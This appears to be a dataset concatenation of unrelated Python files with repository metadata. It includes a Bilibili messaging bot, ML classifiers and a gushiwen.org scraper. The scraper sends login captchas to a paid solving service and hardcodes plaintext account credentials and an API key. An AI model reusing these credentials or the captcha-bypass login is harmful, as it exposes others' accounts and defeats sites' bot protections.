event["CreationTime"] = datetime.datetime.strptime(event["CreationTime"], _date_fmt_str)
# Change the Timezone to UTC
event["CreationTime"] = event["CreationTime"].replace(tzinfo=datetime.timezone.utc)
return activity_events
| [
"adahlin@mckinleycapital.com"
] | adahlin@mckinleycapital.com |
425ebe69aa5703cc003e1e43174d4dd80677a7af | d494098417cafaf8bbf97965b2e2adc5aae2ccf9 | /app.py | d20c2f6f8c3296d8a802f46c51e80d542f0f9253 | [] | no_license | HynemanKan/bilibiliAnimateBot | 51cb96182ce99fe4974ae0cbd8d4dbd76993a62a | 9db4d742f1cecdb32cd477ac206c28334d3d71f5 | refs/heads/master | 2022-12-19T07:14:17.154558 | 2020-09-18T05:45:30 | 2020-09-18T05:45:30 | 296,521,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,551 | py | import json,time,random
import requests
import requests.utils
from flask import Flask,render_template,request,redirect
import db,support
from background import scheduler
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
}
app = Flask(__name__)
def startBackground():
if scheduler.state ==1:
return True
elif scheduler.state==0:
scheduler.start()
return True
else:
scheduler.resume()
return True
@app.route("/")
def index():
if not db.redisdb.exists("bilibili_msg_poster_cookies"):
return render_template("index.html")
else:
startBackground()
return redirect("/state")
@app.route("/state")
def state():
return "<h1>success</h1>"
@app.route('/api/v1/login.json')
def get_login_qr():
if not db.redisdb.exists("bilibili_msg_poster_cookies"):
url = "https://passport.bilibili.com/qrcode/getLoginUrl"
data = requests.get(url,headers=headers).json()
qr_code_url = data["data"]["url"]
db.redisdb.set("bilibili_msg_poster_login_auth",data["data"]["oauthKey"],180)
return json.dumps({
"state":0,
"data":{
"qr_url":qr_code_url,
"timeout":180
}
})
else:
return json.dumps({
"state": -1,
"msg": "login already"
})
@app.route("/background")
def background_state():
print(scheduler.state)
return str(scheduler.state)
@app.route("/api/v1/loginState.json")
def get_login_state():
if not db.redisdb.exists("bilibili_msg_poster_cookies"):
if db.redisdb.exists("bilibili_msg_poster_login_auth"):
auth = db.redisdb.get("bilibili_msg_poster_login_auth")
url = "https://passport.bilibili.com/qrcode/getLoginInfo"
raw_data = requests.post(url,{
"oauthKey":auth
},headers=headers)
data = raw_data.json()
if isinstance(data["data"],int):
loginState = data["data"]
else:
support.set_cookies(raw_data.cookies)
url = "https://api.bilibili.com/nav"
data = requests.get(url, cookies=raw_data.cookies,headers=headers)
data = data.json()
db.redisdb.set("bilibili_msg_poster_uid", data["data"]["mid"])
db.redisdb.set("bilibili_msg_poster_face_url", data["data"]["face"])
startBackground()
loginState = 0
return json.dumps({
"state": 0,
"data": {
"login_state":loginState,
}
})
else:
return json.dumps({
"state": -1,
"msg":"try login First"
})
else:
return json.dumps({
"state": 0,
"data": {
"login_state": 0,
}
})
@app.route("/api/v1/getNums.json")
@support.login_required
def getNums():
url = "https://api.bilibili.com/x/relation/stat?vmid={}"
uid = db.redisdb.get("bilibili_msg_poster_uid")
targetUrl=url.format(uid)
cookies = support.get_cookies()
data={}
print(targetUrl)
res = requests.get(targetUrl,cookies=cookies,headers=headers).json()
print(res)
data["follower"]=res["data"]["follower"]
url = "http://api.bilibili.com/x/space/upstat?mid={}"
targetUrl=url.format(uid)
res = requests.get(targetUrl, cookies=cookies,headers=headers).json()
data["videoView"]= res["data"]["archive"]["view"]
data["articleView"]=res["data"]["article"]["view"]
data["like"] = res["data"]["likes"]
return json.dumps({
"state":0,
"data":data
})
@app.route("/api/v1/getSelfInfo.json")
@support.login_required
def getSelfInfo():
url = "https://api.bilibili.com/nav"
cookies_jar = support.get_cookies()
res = requests.get(url,cookies=cookies_jar,headers=headers)
support.set_cookies(res.cookies)
data = res.json()
return json.dumps(data)
def gen_id():
n = "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx"
out = []
charlist = "0123456789ACBDEF"
for char in n:
e = int(16 * random.random())
if char == "x":
out.append(charlist[e])
elif char == "y":
out.append(charlist[e & 3 | 8])
else:
out.append(char)
return "".join(out)
@app.route("/api/v1/send_text_msg.json",methods=["POST"])
@support.login_required
def send_text_msg():
receiver_id = request.form["receiver_id"]
msg_content = request.form["msg_content"]
uid = db.redisdb.get("bilibili_msg_poster_uid")
cookies_jar = support.get_cookies()
url = "https://api.vc.bilibili.com/web_im/v1/web_im/send_msg"
data = {
"msg[sender_uid]":uid,
"msg[receiver_id]":receiver_id,
"msg[receiver_type]":1,
"msg[msg_type]":1,
"msg[msg_status]":0,
"msg[content]": json.dumps({
"content":msg_content
}),
"msg[timestamp]":int(time.time()),
"msg[dev_id]":gen_id(),
"build":0,
"mobi_app":"web",
"csrf_token":support.get_cookies_value("bili_jct")
}
res = requests.post(url,data,cookies=cookies_jar,headers=headers).json()
return json.dumps(res)
@app.route("/api/v1/send_msg.json",methods=["POST"])
@support.login_required
def send_msg():
receiver_id = request.form["receiver_id"]
msg_type = request.form["msg_type"]
uid = db.redisdb.get("bilibili_msg_poster_uid")
msg = request.form["msg"]
cookies_jar = support.get_cookies()
url = "https://api.vc.bilibili.com/web_im/v1/web_im/send_msg"
data = {
"msg[sender_uid]":uid,
"msg[receiver_id]":receiver_id,
"msg[receiver_type]":1,
"msg[msg_type]":msg_type,
"msg[msg_status]":0,
"msg[content]":msg,
"msg[timestamp]":int(time.time()),
"msg[dev_id]":gen_id(),
"build":0,
"mobi_app":"web",
"csrf_token":support.get_cookies_value("bili_jct")
}
res = requests.post(url,data,cookies=cookies_jar,headers=headers).json()
return json.dumps(res)
@app.route("/logout")
@support.login_required
def logout():
db.redisdb.delete("bilibili_msg_poster_cookies")
return "logout"
if __name__ == '__main__':
db.redisdb.flushall()
db.cursor.execute("delete from followings")
db.mysql.commit()
app.run("0.0.0.0",8080)
| [
"kxkxkxkx1214@outlook.com"
] | kxkxkxkx1214@outlook.com |
f0df7e8e93677297d690aea3885242627f116bec | 07b6716938f05577a4f8df0b1eed71136c45fb45 | /practice/UpadteInformation/LoginPublicMethods.py | 7a73ee68b514163d53ad9958f3e5780aff2c8e7c | [] | no_license | caotya/selenium7th_1 | a7e0f3292eeefb515769063ff303a880b86716bf | 7ffe69e5b8f46a42ad13aeab73c7d0bea54af756 | refs/heads/master | 2020-03-21T19:43:48.321999 | 2018-06-28T04:36:43 | 2018-06-28T04:36:43 | 138,966,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
class Login:
def LoginPublicMethods(self,driver):
driver.get("http://localhost/")
driver.implicitly_wait(20)
login_target = driver.find_element_by_link_text("登录")
driver.execute_script("arguments[0].removeAttribute('target')", login_target)
login_target.click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("cty")
ActionChains(driver).send_keys(Keys.TAB).send_keys("123456").send_keys(Keys.ENTER).perform() | [
"1404536614@qq.com"
] | 1404536614@qq.com |
fb63ffd2d7635ad3c0aa46d996addf69e3546d0f | f4b362f6b5b5b58ada5366dccf926ce23f61d3e7 | /small.py | a9d75b1cf2dcfbc2fff4a0d035928d04f9827208 | [] | no_license | nutristar/lessons_pro | eb6beae6222b5b0e36b23f9961ccd8a7ffeb584d | ddae845f31fb63d990f9e853fbbc6ff2ea6d3320 | refs/heads/master | 2022-02-07T11:10:19.668397 | 2019-02-03T22:39:26 | 2019-02-03T22:39:26 | 173,500,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12 | py | x=1
y=[2,3]
| [
"deniszmail@gmail.com"
] | deniszmail@gmail.com |
68c72262983dd408118feeb106edd957dae536c8 | 76820d80627dc4f431017ce69184fd2630f96e84 | /Clientes[CodigoLegado]/business/control/Commands/ComandoVerificaSenha.py | a4484cc23c4395618ff384130def1dded0ab359e | [] | no_license | douglasliralima/Beak | 1b3526b2585c772864aa33a0a10dd7ca4effa4f4 | 8a494afdb6c7e23ceacc8f12f69dabaadde73206 | refs/heads/master | 2023-01-07T21:01:08.097637 | 2019-10-02T01:28:19 | 2019-10-02T01:28:19 | 175,688,966 | 0 | 0 | null | 2023-01-04T10:44:40 | 2019-03-14T19:47:12 | HTML | UTF-8 | Python | false | false | 240 | py | from business.control.Commands.Comando import Comando
class comando_verifica_senha(Comando):
def __init__(self, verifica_cliente):
self.__cliente_validado = verifica_cliente
def executa(self):
self.__cliente_validado.valida_senha() | [
"douglasliralima@gmail.com"
] | douglasliralima@gmail.com |
355e1dafe9411709137e69f5fff64559073d4090 | cf10924f40f84e9b2a990e0964d90223ddfce9a3 | /PY/analize.py | 27dc3833131132106f06297e0c225acd074aa441 | [] | no_license | jayc37/site | 03212eba0f2b0a85415b88933b98d8eb6e6f75b4 | eac243a8ce43de1e704e16ae49043da2031a1c2d | refs/heads/master | 2023-01-19T20:44:18.108549 | 2020-11-21T04:55:16 | 2020-11-21T04:55:16 | 314,528,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | import numpy as np
import pandas as pd
from oddeven import isEven,val1,val2
def analize(_dict):
_d = _dict['rates']
_index = get_keys(_d)
_values = get_val(_d)
dataSet = odd_even(_index,_values)
return _index,dataSet
def odd_even(_index,_value):
dataSet = {}
for i in range(len(_index)):
idx = _index[i]
vl1 = _value[i]
_inc = 10.0002
t = getlistIndex1(vl1)
_ls =getlistIndex2(t,vl1,_inc)
dataSet[idx] = _ls
return dataSet
def getlistIndex1(vl1):
_temp = []
if (isEven(str(vl1))):
_value1 = val1(vl1,'Even')
_temp.append(_value1)
else :
_value1 = val1(vl1,'Odd')
_temp.append(_value1)
return _temp
def getlistIndex2(_temp,vl,number):
vl2 = vl + number
if (isEven(str(vl2))):
_value2 = val2(vl2,'Even')
_temp.append(_value2)
else :
_value2 = val2(vl2,'Odd')
_temp.append(_value2)
return _temp
def get_keys(_dict):
return list(_dict.keys())
def get_val(_dict):
return list(_dict.values())
# This code is contributed
# by Nikita Tiwari. | [
"son.tran@phattien.local"
] | son.tran@phattien.local |
31360d3f126b1d2754f6f77c0e7e2f772b35e62f | aeb4b69cd7f6aea6a15336be8b869956fbe00726 | /Model.py | d17fcf417c837792e9e42a5dccc92b7e4119f0b0 | [] | no_license | gandharvsuri/Toxic-Comment-Classification | 0c18966414a5c9a57d2cae3a1c1fd7ee53ce6530 | 5c2347f7d22b2ec8b05c22e73f5f2bc77f681025 | refs/heads/master | 2020-08-23T06:06:09.923296 | 2020-05-23T09:44:29 | 2020-05-23T09:44:29 | 216,558,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,422 | py |
# Required library imports
import numpy as np
import pandas as pd
from skmultilearn.problem_transform import ClassifierChain
from sklearn.linear_model import LogisticRegression
from skmultilearn.problem_transform import LabelPowerset
from imblearn.ensemble import EasyEnsembleClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import learning_curve
from sklearn.feature_selection import SelectFromModel
from sklearn.ensemble import VotingClassifier
from sklearn.externals import joblib
from features_extraction import get_features
class_names = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
def pr(y_i, y,train_features):
p = train_features[y==y_i].sum(0)
return (p+1) / ((y==y_i).sum()+1)
def EasyEnsembleClassfier(data,test_data):
train_text = data['comment_text'].values.astype(str)
test_text = test_data['comment_text'].values.astype(str)
all_text = np.concatenate([train_text, test_text])
train_features,test_features = get_features(train_text,test_text,all_text)
submission = pd.DataFrame.from_dict({'Id': test_data['id']})
for class_name in class_names:
train_target = data[class_name]
y = train_target.values
r = np.log(pr(1,y,train_features) / pr(0,y,train_features))
x_nb = train_features.multiply(r)
l = EasyEnsembleClassifier(base_estimator=LogisticRegression(C=2, solver='sag', max_iter=500))
n = EasyEnsembleClassifier(base_estimator=SGDClassifier(alpha=.0002, max_iter=180, penalty="l2", loss='modified_huber'))
o = LogisticRegression(C=2, dual=True, max_iter=500)
p = RandomForestClassifier(criterion='gini',
max_depth=100, max_features=1000, max_leaf_nodes=None, min_samples_split=10,
min_weight_fraction_leaf=0.0, n_estimators=80)
m = VotingClassifier(estimators=[ ('lr', l), ('sgd', n),('lr1',o),('rdf',p)], voting='soft', weights=[0.9,1.35,0.65,0.8])
m.fit(x_nb, y)
submission[class_name] = m.predict_proba(test_features.multiply(r))[:, 1]
submission.to_csv('EnsembleClassfierSubmission_2.csv', index=False)
joblib.dump(m,'Ensemble.pkl')
if __name__ == "__main__":
data = pd.read_csv('./Data/ppc_train.csv')
test_data = pd.read_csv('./Data/ppc_test.csv')
EasyEnsembleClassfier(data,test_data) | [
"gandharv.suri@iiitb.org"
] | gandharv.suri@iiitb.org |
bc74602fe4e6cba46dc8330e664a6ecb75db54e6 | d50ba91c7614f2fa07e0235adb933bbececafaa6 | /limix/ensemble/lmm_forest_utils.py | bd313a82336bade3257e3686e792b17c8bffeec0 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jlmaccal/limix | 59c3154e8fc543068da17677e51f513423fbca54 | 8029d3df3883bd2043c449e5d8f4da6a7936dc32 | refs/heads/master | 2020-12-30T20:50:18.680123 | 2016-04-14T21:19:36 | 2016-04-14T21:19:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,440 | py | import scipy as SP
import par_lmm_forest as parUtils
import random
def checkMaf(X, maf=None):
if maf==None:
maf = 1.0/X.shape[0]
Xmaf = (X>0).sum(axis=0)
Iok = (Xmaf>=(maf*X.shape[0]))
return SP.where(Iok)[0]
def scale_K(K, verbose=False):
"""scale covariance K such that it explains unit variance"""
c = SP.sum((SP.eye(len(K)) - (1.0 / len(K)) * SP.ones(K.shape)) * SP.array(K))
scalar = (len(K) - 1) / c
if verbose:
print 'Kinship scaled by: %0.4f' % scalar
K = scalar * K
return K
def update_Kernel(unscaled_kernel, X_upd_in, scale=True):
#filter and scale SNPs
X_upd = X_upd_in.copy()
X_upd = X_upd[:,checkMaf(X_upd)]
X_upd -= X_upd.mean(axis=0)
X_upd /= X_upd.std(axis=0)
X_upd = X_upd.T
#update kernel
kernel_out = unscaled_kernel.copy()
kernel_out -= SP.dot(X_upd.T, X_upd)
if scale:
return scale_K(kernel_out)
else:
return kernel_out
def estimateKernel(X, msample=None, maf=None, scale=True):
#1. maf filter
Xpop = X.copy()
Xpop = Xpop[:,checkMaf(X, maf)]
#2. sampling of predictors
if msample != None:
msample = SP.random.permutation(X.shape[1])[:msample]
Xpop = Xpop[:,msample]
Xpop -= Xpop.mean(axis=0)
Xpop /= Xpop.std(axis=0)
Xpop = Xpop.copy().T
Xpop = SP.array(Xpop, dtype='float')
Kpop = SP.dot(Xpop.T,Xpop)
if scale:
return scale_K(Kpop)
else:
return Kpop
def k_fold_cross_validation(items, k, randomize=True, seed=True):
if randomize:
if seed:
random.seed(10) # make shure we get similar partitions across methods
items = list(items)
random.shuffle(items)
slices = [items[i::k] for i in xrange(k)]
for i in xrange(k):
validation = slices[i]
training = [item
for s in slices if s is not validation
for item in s]
yield validation
def crossValidationScheme(folds, n):
validationList = []
for validation in k_fold_cross_validation(range(n), folds):
indexes = SP.ones(n) == 0
indexes[validation] = True
validationList.append(indexes)
return validationList
def crossValidate(y, X, K=None, folds=3, model=None, returnModel=False):
errors = SP.empty(folds)
n = y.shape[0]
indexes = crossValidationScheme(folds,n)
predictions = SP.empty(y.shape)
alpha = []
alphas = []
msePath = []
for cvRun in SP.arange(len(indexes)):
testIndexes = indexes[cvRun]
yTrain = y[~testIndexes]
XTrain = X[~testIndexes]
if K == None:
model.fit(XTrain, yTrain)
prediction = SP.reshape(model.predict(X[testIndexes]), (-1,1))
else: # models having population structure
KTrain = K[~testIndexes]
KTrain = KTrain[:,~testIndexes]
KTest=K[testIndexes]
KTest=KTest[:,~testIndexes]
model.reset()
model.kernel = KTrain #TODO: make nice integration
model.fit(XTrain, yTrain)
prediction = SP.reshape(model.predict(X[testIndexes], k=KTest), (-1,1))
predictions[testIndexes] = prediction
errors[cvRun] = predictionError(y[testIndexes], prediction)
print 'prediction error right now is', errors[cvRun]
if returnModel:
alpha.append(model.alpha)
alphas.append(model.alphas)
msePath.append(model.mse_path)
if returnModel:
return indexes, predictions, errors, alpha, alphas, msePath
else:
return indexes, predictions, errors
def predictionError(yTest, yPredict):
return ((yTest - yPredict)**2).sum()/SP.float_(yTest.shape[0])
def getQuadraticKernel(X, d=.01):
K = SP.empty((X.shape[0], X.shape[0]))
for i in SP.arange(X.shape[0]):
for j in SP.arange(X.shape[0]):
K[i,j] = SP.exp(-0.5/d*(X[i]-X[j])**2)
return scale_K(K)
def generate_linear_data(n_max, n_step, ssv_g, var):
x = SP.arange(0,n_max,n_step).reshape(-1,1)
y = SP.zeros_like(x).reshape(-1,1)*0.0
X = convertToBinaryPredictor(x)
Xbg = (SP.random.rand(X.shape[0], X.shape[1]) < .5) * 1.0
weights = var*SP.random.randn(2,1)
y += X[:,3:4] * weights[0,:]
Xbg[:,3:4] = X[:,3:4]
l = X[:,1:2] * X[:,2:3]
Xbg[:,1:2] = X[:,1:2]
Xbg[:,2:3] = X[:,2:3]
y += l * weights[1,:]
yTr = y.copy()
ssv_v = 1.0-ssv_g
if ssv_g > 0.0:
ldelta = SP.log(ssv_v/SP.float_(ssv_g))
K = scale_K(getQuadraticKernel(x, d=20))
else:
ldelta = None
K = SP.eye(y.shape[0])
y += SP.random.multivariate_normal(SP.zeros(K.shape[0]),ssv_g*K+ssv_v*SP.eye(K.shape[0])).reshape(-1,1)
return Xbg, x, y, yTr, K, ldelta
def convertToBinaryPredictor(x):
arr = []
a = 0
for i in SP.arange(x.size):
arr.append(bin(x[i,0])[2:])
l = max(a, bin(x[i,0])[2:].__len__())
X = SP.zeros((x.size,l))
for i in SP.arange(x.size):
head0=l-arr[i].__len__()
for j in SP.arange(head0):
X[i,j] = 0
for j in SP.arange(arr[i].__len__()):
X[i,head0+j] = SP.int16(arr[i][j])
return X
# generates data sets to test the continous version of the mixed forest
def lin_data_cont_predictors(n=100, m=1):
X = SP.random.randn(n,m)
beta = SP.random.randn(m,1)
beta[1:]=0
y = SP.dot(X,beta)
return X, y
| [
"joh.stephan@gmail.com"
] | joh.stephan@gmail.com |
dc7ecb8fba15f6b0a0781b7296143b29b6ebe67e | 9bc81f51f1205b6b3476805ade30937923f658fa | /gushiwen.py | 2722a99b84189b78b539b1422995aa246c494beb | [] | no_license | JoyMichele/spider | 4229d2a38d0250da45008231de2e3fc6e9a007fd | 7427097082d854d8abe4a3a819eeba5220a38df9 | refs/heads/master | 2020-04-15T17:10:52.913231 | 2019-01-13T15:28:01 | 2019-01-13T15:28:01 | 164,864,337 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,516 | py |
# coding: utf-8
# In[3]:
import http.client, mimetypes, urllib, json, time, requests
######################################################################
class YDMHttp:
apiurl = 'http://api.yundama.com/api.php'
username = ''
password = ''
appid = ''
appkey = ''
def __init__(self, username, password, appid, appkey):
self.username = username
self.password = password
self.appid = str(appid)
self.appkey = appkey
def request(self, fields, files=[]):
response = self.post_url(self.apiurl, fields, files)
response = json.loads(response)
return response
def balance(self):
data = {'method': 'balance', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['balance']
else:
return -9001
def login(self):
data = {'method': 'login', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['uid']
else:
return -9001
def upload(self, filename, codetype, timeout):
data = {'method': 'upload', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey, 'codetype': str(codetype), 'timeout': str(timeout)}
file = {'file': filename}
response = self.request(data, file)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['cid']
else:
return -9001
def result(self, cid):
data = {'method': 'result', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey, 'cid': str(cid)}
response = self.request(data)
return response and response['text'] or ''
def decode(self, filename, codetype, timeout):
cid = self.upload(filename, codetype, timeout)
if (cid > 0):
for i in range(0, timeout):
result = self.result(cid)
if (result != ''):
return cid, result
else:
time.sleep(1)
return -3003, ''
else:
return cid, ''
def report(self, cid):
data = {'method': 'report', 'username': self.username, 'password': self.password, 'appid': self.appid, 'appkey': self.appkey, 'cid': str(cid), 'flag': '0'}
response = self.request(data)
if (response):
return response['ret']
else:
return -9001
def post_url(self, url, fields, files=[]):
for key in files:
files[key] = open(files[key], 'rb');
res = requests.post(url, files=files, data=fields)
return res.text
def get_code_text(codeType,imgPath):
# 用户名:普通用户
username = 'jilei761199418'
# 密码
password = 'lzjl95880'
# 软件ID,开发者分成必要参数。登录开发者后台【我的软件】获得!
appid = 6591
# 软件密钥,开发者分成必要参数。登录开发者后台【我的软件】获得!
appkey = '099869da9c97a826fa3afc8d8f4de224'
# 图片文件
filename = imgPath
# 验证码类型,# 例:1004表示4位字母数字,不同类型收费不同。请准确填写,否则影响识别率。在此查询所有类型 http://www.yundama.com/price.html
codetype = codeType
# 超时时间,秒
timeout = 15
# 检查
if (username == 'username'):
print('请设置好相关参数再测试')
else:
# 初始化
yundama = YDMHttp(username, password, appid, appkey)
# 登陆云打码
uid = yundama.login();
print('uid: %s' % uid)
# 查询余额
balance = yundama.balance();
print('balance: %s' % balance)
# 开始识别,图片路径,验证码类型ID,超时时间(秒),识别结果
cid, result = yundama.decode(filename, codetype, timeout);
#print('cid: %s, result: %s' % (cid, result))
return result
import requests
from lxml import etree
url = "https://so.gushiwen.org/user/login.aspx?from=http://so.gushiwen.org/user/collect.aspx"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
}
# 实例化一个session对象
session = requests.Session()
page_text = session.get(url=url, headers=headers).text
tree = etree.HTML(page_text)
# 拿到验证码 图片路径
code_src = "https://so.gushiwen.org" + tree.xpath('//*[@id="imgCode"]/@src')[0]
# 拿到验证码 图片 存到本地
img_data = session.get(url=code_src, headers=headers).content
with open("./gushiwen.jpg", "wb") as fp:
fp.write(img_data)
# 调用函数让云打码识别验证码图片 返回图片内容
code_text = get_code_text(1004,'./gushiwen.jpg')
print(code_text)
# 下面这两个很有可能是动态加载的,去前端页面发请求,然后搜索,发现这俩是在 隐藏输入框 中的value
__VIEWSTATE = tree.xpath('//*[@id="__VIEWSTATE"]/@value')[0]
__VIEWSTATEGENERATOR = tree.xpath('//*[@id="__VIEWSTATEGENERATOR"]/@value')[0]
# 登录的url
login_url = 'https://so.gushiwen.org/user/login.aspx?from=http%3a%2f%2fso.gushiwen.org%2fuser%2fcollect.aspx'
# post提交需要携带的数据
data = {
"__VIEWSTATE":__VIEWSTATE,
"__VIEWSTATEGENERATOR":__VIEWSTATEGENERATOR,
"from":"http://so.gushiwen.org/user/collect.aspx",
"email":"www.zhangbowudi@qq.com",
"pwd":"bobo328410948",
"code":code_text,
"denglu":"登录"
}
# 模拟登录 session提交请求 携带cookie (注意这里的session是能够发送请求的对象)
page_text = session.post(url=login_url, headers=headers, data=data).content
# 用写入的方式查看结果 更清晰
with open("./gushiwen.html", "wb") as fp:
fp.write(page_text)
| [
"761199418@qq.com"
] | 761199418@qq.com |
915825db78f4178b3a1f8f7a1ff368f65fd6b37a | 1526dda13d1f4867ac7624663f338c47879c2506 | /blog/admin.py | ae1c5f9fdd0befcd9e45f8ffb013f7f26f393059 | [] | no_license | sohyunki/blog | 5d6640b9f521bbf4a931a7c5b98549a148f4f6d6 | 292973e86cae68f82450e5ce6373390542c3e354 | refs/heads/master | 2023-05-28T04:37:41.048266 | 2021-06-18T19:40:42 | 2021-06-18T19:40:42 | 378,249,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | from django.contrib import admin
from blog.models import Write
admin.site.register(Write)
# Register your models here.
| [
"sohyunki"
] | sohyunki |
45ca5c8bfb465a46b8277775fae7b5875bf981ff | 371dcd051dfb93dd946455225448b02a80d1cd0a | /constant/rgapi.py | 20fb535b2d36db98cfeb859054b75136d9d9dd89 | [
"MIT"
] | permissive | iElden/EldenBot | 7a5a042269d2540d87ac84f57441ddfcdf05ad12 | e8ab08f1071dc9c3d77e51c1778469b6115ec5cf | refs/heads/master | 2023-04-02T01:04:32.284979 | 2023-03-22T17:24:09 | 2023-03-22T17:24:09 | 128,685,082 | 1 | 6 | MIT | 2022-05-06T19:16:10 | 2018-04-08T21:55:41 | Python | UTF-8 | Python | false | false | 11,687 | py | CHAMP_ID_TO_EMOJI = {'266': '<:champ_266:601909182748164097>', '103': '<:champ_103:601909185243774976>', '84': '<:champ_84:601909188612063233>', '12': '<:champ_12:601909190809878530>', '32': '<:champ_32:601909193456222221>', '34': '<:champ_34:601909195968610356>', '1': '<:champ_1:601909198799896690>', '22': '<:champ_22:601909201564073984>', '136': '<:champ_136:601909204034387986>', '268': '<:champ_268:601909206337191937>', '432': '<:champ_432:601909209348571136>', '53': '<:champ_53:601909212175663129>', '63': '<:champ_63:601909215262408705>', '201': '<:champ_201:601909218072592406>', '51': '<:champ_51:601909220664672275>', '164': '<:champ_164:601909222455640094>', '69': '<:champ_69:601909224213053481>', '31': '<:champ_31:601909227174494208>', '42': '<:champ_42:601909229246218250>', '122': '<:champ_122:601909231268134933>', '131': '<:champ_131:601909232954245122>', '119': '<:champ_119:601909235831406759>', '36': '<:champ_36:601909237928689714>', '245': '<:champ_245:601909241250578462>', '60': '<:champ_60:601909243112718355>', '28': '<:champ_28:601909244823863309>', '81': '<:champ_81:601909247458148353>', '9': '<:champ_9:601909250234646746>', '114': '<:champ_114:601909252642045964>', '105': '<:champ_105:601909255259291648>', '3': '<:champ_3:601909257067298865>', '41': '<:champ_41:601909258963124225>', '86': '<:champ_86:601909261915783188>', '150': '<:champ_150:601909264533028932>', '79': '<:champ_79:601909267032702989>', '104': '<:champ_104:601909269520056352>', '120': '<:champ_120:601909272825298944>', '74': '<:champ_74:601909276398714921>', '420': '<:champ_420:601909278105665588>', '39': '<:champ_39:601909281687732317>', '427': '<:champ_427:601909283675963402>', '40': '<:champ_40:601909286418907137>', '59': '<:champ_59:601909288994340933>', '24': '<:champ_24:601909292534071327>', '126': '<:champ_126:601909294975287325>', '202': '<:champ_202:601909297974083605>', '222': '<:champ_222:601909300687929355>', '145': '<:champ_145:601909302814310437>', '429': '<:champ_429:601909305662504981>', '43': '<:champ_43:601909308183150592>', '30': '<:champ_30:601909340571566080>', '38': '<:champ_38:601909342756929557>', '55': '<:champ_55:601909345663582273>', '10': '<:champ_10:601909347945283584>', '141': '<:champ_141:601909349471748112>', '85': '<:champ_85:601909351523024897>', '121': '<:champ_121:601909353540354061>', '203': '<:champ_203:601909356086296609>', '240': '<:champ_240:601909358258946048>', '96': '<:champ_96:601909360284663808>', '7': '<:champ_7:601909362222432266>', '64': '<:champ_64:601909364881883136>', '89': '<:champ_89:601909366802612236>', '127': '<:champ_127:601909370413907984>', '236': '<:champ_236:601909373194993698>', '117': '<:champ_117:601909375317311488>', '99': '<:champ_99:601909377959460885>', '54': '<:champ_54:601909383433027614>', '90': '<:champ_90:601909385614196767>', '57': '<:champ_57:601909388122390529>', '11': '<:champ_11:601909392623009793>', '21': '<:champ_21:601909395030409235>', '62': '<:champ_62:601909398578659358>', '82': '<:champ_82:601909401506414598>', '25': '<:champ_25:601909403448508437>', '267': '<:champ_267:601909406426333198>', '75': '<:champ_75:601909408628211715>', '111': '<:champ_111:601909410805055488>', '518': '<:champ_518:601909414118686752>', '76': '<:champ_76:601909416110981169>', '56': '<:champ_56:601909419189469185>', '20': '<:champ_20:601909421580484629>', '2': '<:champ_2:601909423983558668>', '61': '<:champ_61:601909426474975263>', '516': '<:champ_516:601909428958003212>', '80': '<:champ_80:601909431747346447>', '78': '<:champ_78:601909434142294086>', '555': '<:champ_555:601909436864397322>', '246': '<:champ_246:601909439876038676>', '133': '<:champ_133:601909442371387395>', '497': '<:champ_497:601909445253005335>', '33': '<:champ_33:601909447320797244>', '421': '<:champ_421:601909449850093579>', '58': '<:champ_58:601909452567871571>', '107': '<:champ_107:601909455478718491>', '92': '<:champ_92:601909458230050816>', '68': '<:champ_68:601909460482654208>', '13': '<:champ_13:601909462776676372>', '113': '<:champ_113:601909465624608777>', '35': '<:champ_35:601909468028207135>', '98': '<:champ_98:601909497539067924>', '102': '<:champ_102:601909500059975685>', '27': '<:champ_27:601909503205834764>', '14': '<:champ_14:601909506074607659>', '15': '<:champ_15:601909508129685504>', '72': '<:champ_72:601909510679953438>', '37': '<:champ_37:601909513066643456>', '16': '<:champ_16:601909515222253582>', '50': '<:champ_50:601909518082899972>', '517': '<:champ_517:601909520939089920>', '134': '<:champ_134:601909523493683213>', '223': '<:champ_223:601909526408724480>', '163': '<:champ_163:601909528652546070>', '91': '<:champ_91:601909531223654439>', '44': '<:champ_44:601909533727653918>', '17': '<:champ_17:601909535929794562>', '412': '<:champ_412:601909538701967370>', '18': '<:champ_18:601909541705089054>', '48': '<:champ_48:601909545056337960>', '23': '<:champ_23:601909548735004723>', '4': '<:champ_4:601909551637200898>', '29': '<:champ_29:601909555810795531>', '77': '<:champ_77:601909558604070961>', '6': '<:champ_6:601909560751423526>', '110': '<:champ_110:601909562953433098>', '67': '<:champ_67:601909566078451735>', '45': '<:champ_45:601909568452165653>', '161': '<:champ_161:601909571069411359>', '254': '<:champ_254:601909573863079936>', '112': '<:champ_112:601909575800717332>', '8': '<:champ_8:601909578438934677>', '106': '<:champ_106:601909581311901719>', '19': '<:champ_19:601909584277405709>', '498': 